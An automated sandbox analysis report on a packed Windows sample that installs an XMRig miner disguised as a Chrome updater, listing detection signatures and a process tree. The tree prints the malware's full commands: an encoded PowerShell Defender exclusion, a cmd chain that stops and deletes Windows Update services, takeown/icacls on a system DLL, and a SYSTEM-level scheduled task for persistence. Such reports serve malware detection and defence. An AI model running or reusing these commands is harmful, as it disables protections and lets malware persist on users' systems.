Analysis
-
max time kernel
301s -
max time network
288s -
platform
windows7_x64 -
resource
win7-20220718-en -
resource tags
arch:x64 arch:x86 image:win7-20220718-en locale:en-us os:windows7-x64 system -
submitted
05-08-2022 22:18
Behavioral task
behavioral1
Sample
58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe
Resource
win7-20220718-en
General
-
Target
58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe
-
Size
7.1MB
-
MD5
2144e985a1fb8a18636dee1b1fcf096f
-
SHA1
fac93e4f151a3be8d9b0b6c9d50a31ba9a3e231a
-
SHA256
58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895
-
SHA512
48d3b4b8a95bd4a4bc1405284db373a5acdfe30de15b0641aeef359c06a359dc1344cb8bb1fb63ee35bc38e3eae3fb88eed2128d66d52e9153e1d940be54476c
Malware Config
Signatures
-
Modifies security service 2 TTPs 2 IoCs
Processes: reg.exe
description | ioc | process
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security | reg.exe
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
Processes: 58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe, updater.exe
description | ioc | process
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | updater.exe
-
XMRig Miner payload 13 IoCs
Processes:
resource | yara_rule
behavioral1/memory/1496-160-0x0000000140000000-0x0000000140809000-memory.dmp | xmrig
behavioral1/memory/1496-162-0x0000000140000000-0x0000000140809000-memory.dmp | xmrig
behavioral1/memory/1496-164-0x0000000140000000-0x0000000140809000-memory.dmp | xmrig
behavioral1/memory/1496-165-0x0000000140000000-0x0000000140809000-memory.dmp | xmrig
behavioral1/memory/1496-167-0x0000000140000000-0x0000000140809000-memory.dmp | xmrig
behavioral1/memory/1496-169-0x0000000140000000-0x0000000140809000-memory.dmp | xmrig
behavioral1/memory/1496-171-0x0000000140000000-0x0000000140809000-memory.dmp | xmrig
behavioral1/memory/1496-172-0x0000000140000000-0x0000000140809000-memory.dmp | xmrig
behavioral1/memory/1496-173-0x0000000140000000-0x0000000140809000-memory.dmp | xmrig
behavioral1/memory/1496-175-0x0000000140000000-0x0000000140809000-memory.dmp | xmrig
behavioral1/memory/1496-177-0x0000000140000000-0x0000000140809000-memory.dmp | xmrig
behavioral1/memory/1496-178-0x0000000140000000-0x0000000140809000-memory.dmp | xmrig
behavioral1/memory/1496-180-0x0000000140000000-0x0000000140809000-memory.dmp | xmrig
-
Drops file in Drivers directory 2 IoCs
Processes: conhost.exe, conhost.exe
description | ioc | process
File opened for modification | C:\Windows\system32\drivers\etc\hosts | conhost.exe
File opened for modification | C:\Windows\system32\drivers\etc\hosts | conhost.exe
-
Executes dropped EXE 1 IoCs
Processes: updater.exe
pid | process
1712 | updater.exe
-
Possible privilege escalation attempt 4 IoCs
Processes: takeown.exe, icacls.exe, takeown.exe, icacls.exe
pid | process
1780 | takeown.exe
1712 | icacls.exe
1900 | takeown.exe
1504 | icacls.exe
-
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes: 58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe, updater.exe
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | updater.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | updater.exe
-
Loads dropped DLL 1 IoCs
Processes: taskeng.exe
pid | process
992 | taskeng.exe
-
Modifies file permissions 1 TTPs 4 IoCs
Processes: icacls.exe, takeown.exe, icacls.exe, takeown.exe
pid | process
1504 | icacls.exe
1780 | takeown.exe
1712 | icacls.exe
1900 | takeown.exe
-
Themida packer 9 IoCs
Processes:
resource | yara_rule
behavioral1/memory/872-54-0x0000000000400000-0x0000000001066000-memory.dmp | themida
behavioral1/memory/872-55-0x0000000000400000-0x0000000001066000-memory.dmp | themida
behavioral1/memory/872-57-0x0000000000400000-0x0000000001066000-memory.dmp | themida
\Program Files\Google\Chrome\updater.exe | themida
C:\Program Files\Google\Chrome\updater.exe | themida
behavioral1/memory/1712-99-0x0000000000400000-0x0000000001066000-memory.dmp | themida
behavioral1/memory/1712-101-0x0000000000400000-0x0000000001066000-memory.dmp | themida
behavioral1/memory/1712-105-0x0000000000400000-0x0000000001066000-memory.dmp | themida
C:\Program Files\Google\Chrome\updater.exe | themida
-
Checks whether UAC is enabled 2 IoCs
Processes: updater.exe, 58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe
description | ioc | process
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | updater.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe
-
Drops file in System32 directory 2 IoCs
Processes: powershell.exe, powershell.exe
description | ioc | process
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes: 58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe, updater.exe
pid | process
872 | 58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe
1712 | updater.exe
-
Suspicious use of SetThreadContext 1 IoCs
Processes: conhost.exe
description | pid | process | target process
PID 1392 set thread context of 1496 | 1392 | conhost.exe | explorer.exe
-
Drops file in Program Files directory 3 IoCs
Processes: conhost.exe, conhost.exe
description | ioc | process
File created | C:\Program Files\Google\Chrome\updater.exe | conhost.exe
File opened for modification | C:\Program Files\Google\Chrome\updater.exe | conhost.exe
File created | C:\Program Files\Google\Libs\WR64.sys | conhost.exe
-
Launches sc.exe 10 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes: sc.exe (10 instances)
pid | process
2028 | sc.exe
1392 | sc.exe
1640 | sc.exe
780 | sc.exe
1048 | sc.exe
912 | sc.exe
292 | sc.exe
628 | sc.exe
1068 | sc.exe
1588 | sc.exe
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 5 IoCs
Processes: conhost.exe, powershell.exe
description | ioc | process
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | conhost.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | conhost.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | conhost.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | powershell.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = f0fba5292aa9d801 | powershell.exe
-
Modifies registry key 1 TTPs 18 IoCs
Processes: reg.exe (18 instances)
pid | process
456 | reg.exe
1412 | reg.exe
828 | reg.exe
2016 | reg.exe
1396 | reg.exe
1208 | reg.exe
2044 | reg.exe
1468 | reg.exe
692 | reg.exe
320 | reg.exe
532 | reg.exe
2044 | reg.exe
1988 | reg.exe
780 | reg.exe
1540 | reg.exe
1684 | reg.exe
1744 | reg.exe
1060 | reg.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes: powershell.exe, conhost.exe, powershell.exe, conhost.exe, explorer.exe
pid | process
1380 | powershell.exe
628 | conhost.exe
1908 | powershell.exe
1392 | conhost.exe
1496 | explorer.exe (60 entries)
-
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid | process
468 | 
-
Suspicious use of AdjustPrivilegeToken 15 IoCs
Processes: powershell.exe, powercfg.exe, powercfg.exe, powercfg.exe, conhost.exe, powercfg.exe, takeown.exe, powershell.exe, powercfg.exe, powercfg.exe, conhost.exe, powercfg.exe, powercfg.exe, takeown.exe, explorer.exe
description | pid | process
Token: SeDebugPrivilege | 1380 | powershell.exe
Token: SeShutdownPrivilege | 1232 | powercfg.exe
Token: SeShutdownPrivilege | 1540 | powercfg.exe
Token: SeShutdownPrivilege | 636 | powercfg.exe
Token: SeDebugPrivilege | 628 | conhost.exe
Token: SeShutdownPrivilege | 1168 | powercfg.exe
Token: SeTakeOwnershipPrivilege | 1900 | takeown.exe
Token: SeDebugPrivilege | 1908 | powershell.exe
Token: SeShutdownPrivilege | 1752 | powercfg.exe
Token: SeShutdownPrivilege | 908 | powercfg.exe
Token: SeDebugPrivilege | 1392 | conhost.exe
Token: SeShutdownPrivilege | 1368 | powercfg.exe
Token: SeShutdownPrivilege | 1504 | powercfg.exe
Token: SeTakeOwnershipPrivilege | 1780 | takeown.exe
Token: SeLockMemoryPrivilege | 1496 | explorer.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes: 58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe, conhost.exe, cmd.exe, cmd.exe
description | pid | process | target process (each row is repeated as many times as shown)
PID 872 wrote to memory of 628 | 872 | 58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe | conhost.exe (x4)
PID 628 wrote to memory of 1380 | 628 | conhost.exe | powershell.exe (x3)
PID 628 wrote to memory of 1400 | 628 | conhost.exe | cmd.exe (x3)
PID 628 wrote to memory of 1700 | 628 | conhost.exe | cmd.exe (x3)
PID 1400 wrote to memory of 1392 | 1400 | cmd.exe | sc.exe (x3)
PID 1700 wrote to memory of 1232 | 1700 | cmd.exe | powercfg.exe (x3)
PID 1400 wrote to memory of 1640 | 1400 | cmd.exe | sc.exe (x3)
PID 1700 wrote to memory of 1540 | 1700 | cmd.exe | powercfg.exe (x3)
PID 1400 wrote to memory of 780 | 1400 | cmd.exe | sc.exe (x3)
PID 1700 wrote to memory of 636 | 1700 | cmd.exe | powercfg.exe (x3)
PID 1400 wrote to memory of 1048 | 1400 | cmd.exe | sc.exe (x3)
PID 1700 wrote to memory of 1168 | 1700 | cmd.exe | powercfg.exe (x3)
PID 1400 wrote to memory of 292 | 1400 | cmd.exe | sc.exe (x3)
PID 1400 wrote to memory of 320 | 1400 | cmd.exe | reg.exe (x3)
PID 1400 wrote to memory of 828 | 1400 | cmd.exe | reg.exe (x3)
PID 1400 wrote to memory of 532 | 1400 | cmd.exe | reg.exe (x3)
PID 1400 wrote to memory of 1208 | 1400 | cmd.exe | reg.exe (x3)
PID 1400 wrote to memory of 2016 | 1400 | cmd.exe | reg.exe (x3)
PID 1400 wrote to memory of 1900 | 1400 | cmd.exe | takeown.exe (x3)
PID 1400 wrote to memory of 1504 | 1400 | cmd.exe | icacls.exe (x3)
PID 628 wrote to memory of 1068 | 628 | conhost.exe | cmd.exe (x3)
Processes
-
C:\Users\Admin\AppData\Local\Temp\58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe 1⤵
  "C:\Users\Admin\AppData\Local\Temp\58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe"
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of WriteProcessMemory
  C:\Windows\System32\conhost.exe 2⤵
    "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe"
    - Drops file in Drivers directory
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 3⤵
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAYQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAZABqAHoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdwBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAeQAjAD4A"
      - Drops file in System32 directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\System32\cmd.exe 3⤵
      "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
      - Suspicious use of WriteProcessMemory
      C:\Windows\system32\sc.exe 4⤵
        sc stop UsoSvc
        - Launches sc.exe
      C:\Windows\system32\sc.exe 4⤵
        sc stop WaaSMedicSvc
        - Launches sc.exe
      C:\Windows\system32\sc.exe 4⤵
        sc stop wuauserv
        - Launches sc.exe
      C:\Windows\system32\sc.exe 4⤵
        sc stop bits
        - Launches sc.exe
      C:\Windows\system32\sc.exe 4⤵
        sc stop dosvc
        - Launches sc.exe
      C:\Windows\system32\reg.exe 4⤵
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
        - Modifies registry key
      C:\Windows\system32\reg.exe 4⤵
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
        - Modifies registry key
      C:\Windows\system32\reg.exe 4⤵
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
        - Modifies security service
        - Modifies registry key
      C:\Windows\system32\reg.exe 4⤵
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
        - Modifies registry key
      C:\Windows\system32\reg.exe 4⤵
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
        - Modifies registry key
      C:\Windows\system32\takeown.exe 4⤵
        takeown /f C:\Windows\System32\WaaSMedicSvc.dll
        - Possible privilege escalation attempt
        - Modifies file permissions
        - Suspicious use of AdjustPrivilegeToken
      C:\Windows\system32\icacls.exe 4⤵
        icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
        - Possible privilege escalation attempt
        - Modifies file permissions
      C:\Windows\system32\reg.exe 4⤵
        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
        - Modifies registry key
      C:\Windows\system32\reg.exe 4⤵
        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
        - Modifies registry key
      C:\Windows\system32\reg.exe 4⤵
        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
        - Modifies registry key
      C:\Windows\system32\reg.exe 4⤵
        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
        - Modifies registry key
      C:\Windows\system32\schtasks.exe 4⤵
        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
      C:\Windows\system32\schtasks.exe 4⤵
        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
      C:\Windows\system32\schtasks.exe 4⤵
        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
      C:\Windows\system32\schtasks.exe 4⤵
        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
      C:\Windows\system32\schtasks.exe 4⤵
        SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
      C:\Windows\system32\schtasks.exe 4⤵
        SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
      C:\Windows\system32\schtasks.exe 4⤵
        SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
    C:\Windows\System32\cmd.exe 3⤵
      "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
      - Suspicious use of WriteProcessMemory
      C:\Windows\system32\powercfg.exe 4⤵
        powercfg /x -hibernate-timeout-ac 0
        - Suspicious use of AdjustPrivilegeToken
      C:\Windows\system32\powercfg.exe 4⤵
        powercfg /x -hibernate-timeout-dc 0
        - Suspicious use of AdjustPrivilegeToken
      C:\Windows\system32\powercfg.exe 4⤵
        powercfg /x -standby-timeout-ac 0
        - Suspicious use of AdjustPrivilegeToken
      C:\Windows\system32\powercfg.exe 4⤵
        powercfg /x -standby-timeout-dc 0
        - Suspicious use of AdjustPrivilegeToken
    C:\Windows\System32\cmd.exe 3⤵
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""
      C:\Windows\system32\schtasks.exe 4⤵
        schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""
        - Creates scheduled task(s)
    C:\Windows\System32\cmd.exe 3⤵
      "C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
      C:\Windows\system32\schtasks.exe 4⤵
        schtasks /run /tn "GoogleUpdateTaskMachineQC"
C:\Windows\system32\taskeng.exe 1⤵
  taskeng.exe {97B9D42D-77A4-430E-8B02-6FA1F34A19B5} S-1-5-18:NT AUTHORITY\System:Service:
  - Loads dropped DLL
  C:\Program Files\Google\Chrome\updater.exe 2⤵
    "C:\Program Files\Google\Chrome\updater.exe"
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Executes dropped EXE
    - Checks BIOS information in registry
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    C:\Windows\System32\conhost.exe 3⤵
      "C:\Windows\System32\conhost.exe" "C:\Program Files\Google\Chrome\updater.exe"
      - Drops file in Drivers directory
      - Suspicious use of SetThreadContext
      - Drops file in Program Files directory
      - Modifies data under HKEY_USERS
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 4⤵
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAYQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAZABqAHoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdwBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAeQAjAD4A"
        - Drops file in System32 directory
        - Modifies data under HKEY_USERS
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
      C:\Windows\System32\cmd.exe 4⤵
        "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
        C:\Windows\system32\sc.exe 5⤵
          sc stop UsoSvc
          - Launches sc.exe
        C:\Windows\system32\sc.exe 5⤵
          sc stop WaaSMedicSvc
          - Launches sc.exe
        C:\Windows\system32\sc.exe 5⤵
          sc stop wuauserv
          - Launches sc.exe
        C:\Windows\system32\sc.exe 5⤵
          sc stop bits
          - Launches sc.exe
        C:\Windows\system32\sc.exe 5⤵
          sc stop dosvc
          - Launches sc.exe
        C:\Windows\system32\reg.exe 5⤵
          reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
          - Modifies registry key
        C:\Windows\system32\reg.exe 5⤵
          reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
          - Modifies registry key
        C:\Windows\system32\reg.exe 5⤵
          reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
          - Modifies registry key
        C:\Windows\system32\reg.exe 5⤵
          reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
          - Modifies registry key
        C:\Windows\system32\reg.exe 5⤵
          reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
          - Modifies registry key
        C:\Windows\system32\takeown.exe 5⤵
          takeown /f C:\Windows\System32\WaaSMedicSvc.dll
          - Possible privilege escalation attempt
          - Modifies file permissions
          - Suspicious use of AdjustPrivilegeToken
        C:\Windows\system32\icacls.exe 5⤵
          icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
          - Possible privilege escalation attempt
          - Modifies file permissions
        C:\Windows\system32\reg.exe 5⤵
          reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
          - Modifies registry key
        C:\Windows\system32\reg.exe 5⤵
          reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
          - Modifies registry key
        C:\Windows\system32\reg.exe 5⤵
          reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
          - Modifies registry key
        C:\Windows\system32\reg.exe 5⤵
          reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
          - Modifies registry key
        C:\Windows\system32\schtasks.exe 5⤵
          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
        C:\Windows\system32\schtasks.exe 5⤵
          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
        C:\Windows\system32\schtasks.exe 5⤵
          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
        C:\Windows\system32\schtasks.exe 5⤵
          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
        C:\Windows\system32\schtasks.exe 5⤵
          SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
        C:\Windows\system32\schtasks.exe 5⤵
          SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
        C:\Windows\system32\schtasks.exe 5⤵
          SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
      C:\Windows\System32\cmd.exe 4⤵
        "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
        C:\Windows\system32\powercfg.exe 5⤵
          powercfg /x -hibernate-timeout-ac 0
          - Suspicious use of AdjustPrivilegeToken
        C:\Windows\system32\powercfg.exe 5⤵
          powercfg /x -hibernate-timeout-dc 0
          - Suspicious use of AdjustPrivilegeToken
        C:\Windows\system32\powercfg.exe 5⤵
          powercfg /x -standby-timeout-ac 0
          - Suspicious use of AdjustPrivilegeToken
        C:\Windows\system32\powercfg.exe 5⤵
          powercfg /x -standby-timeout-dc 0
          - Suspicious use of AdjustPrivilegeToken
      C:\Windows\System32\conhost.exe 4⤵
        C:\Windows\System32\conhost.exe "bmkeytcye"
      C:\Windows\explorer.exe 4⤵
